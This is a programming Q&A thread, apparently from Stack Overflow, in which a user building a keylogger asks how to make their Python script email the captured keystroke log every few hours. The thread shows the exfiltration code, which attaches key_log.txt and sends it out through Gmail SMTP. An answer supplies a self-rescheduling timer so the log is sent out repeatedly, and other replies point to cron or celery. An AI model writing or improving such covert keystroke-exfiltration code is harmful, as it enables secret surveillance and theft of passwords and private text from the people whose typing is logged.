# keylogger project, email interval issue

Tags: python, email, keylogger

I am making a keylogger that sends an email with the log attached every x hours. I tried to used the threading.Timer() command; However, it is sending the email ONCE. Below is my code: UPDATE: As alternative, I also tried to have the email sent once a day at specific time, but I don't know the exact commands needed for it.

```
keys_information = "key_log.txt"

email_address = email sender
password = password

username = getpass.getuser()

toaddr = receiver email


file_path = "text file location"
extend = "\\"
file_merge = file_path + extend

# email controls
def send_email(filename, attachment, toaddr):

    fromaddr = email_address
    msg = MIMEMultipart()
    msg['From'] = fromaddr
    msg['To'] = toaddr
    msg['Subject'] = "Log File"
    body = "Body_of_the_mail"
    msg.attach(MIMEText(body, 'plain'))

    filename = filename
    attachment = open(attachment, 'rb')
    p = MIMEBase('application', 'octet-stream')
    p.set_payload((attachment).read())
    encoders.encode_base64(p)
    p.add_header('Content-Disposition', "attachment; filename= %s" % filename)
    msg.attach(p)
    s = smtplib.SMTP('smtp.gmail.com', 587)                                     #to access the server
    s.starttls()
    s.login(fromaddr, password)
    text = msg.as_string()
    s.sendmail(fromaddr, toaddr, text)
    s.quit()

t = threading.Timer(10, send_email, [keys_information, file_path + extend + keys_information, toaddr])
t.start()
```

Comment: What part of `Timer`'s documentation gives you the impression that it will run more than once?

Comment: Look into `cron` or `celery` for periodic scheduling. `Timer` module is useless for what you are trying to do

Comment: How can I use cron or celery? How should I modify the codes in my programming?

Answer (score 0):

I would actually recommend trying to use a system facility intended for these kind of scheduled jobs to trigger this on a regular basis, like cron on Linux or the task scheduler on Windows. They will ensure that the job is run on time. Doing it internally in a program like this can fail if the program stops running for any reason (like the system restart), whereas a cron job will always run it.

However, to answer your question. You can have this repeat by creating a new timer at the end of the send_email function, or better create another method that the timer calls instead which calls send_email and then creates a new timer.

```
# email controls
def send_email(filename, attachment, toaddr):
    ...

def trigger(*args):
    send_email(*args)
    t = threading.Timer(10, trigger, args)
    t.start()

t = threading.Timer(10, trigger, [keys_information, file_path + extend + keys_information, toaddr])
t.start()
```

This will not spawn an ever increasing number of threads since the thread running the t.start() exits after the start() returns, which is before the timer thread triggers.

Note: that the time you have set the timer to go off at is not the 'x hours' you mentioned but is only 10 seconds. I assume that was for testing.

Again this is probably not the right choice of how to do this though.

Comment: I want to use in in seconds (or in minutes), just for testing purposes for my project.
For the "def trigger(*args):". Do I need to write it exactly like that?

Comment: How can I make a schedule in Python. Yeah I am aware it may fail if program stops running, or if system restarts. But I want to use it as test, and demonstration.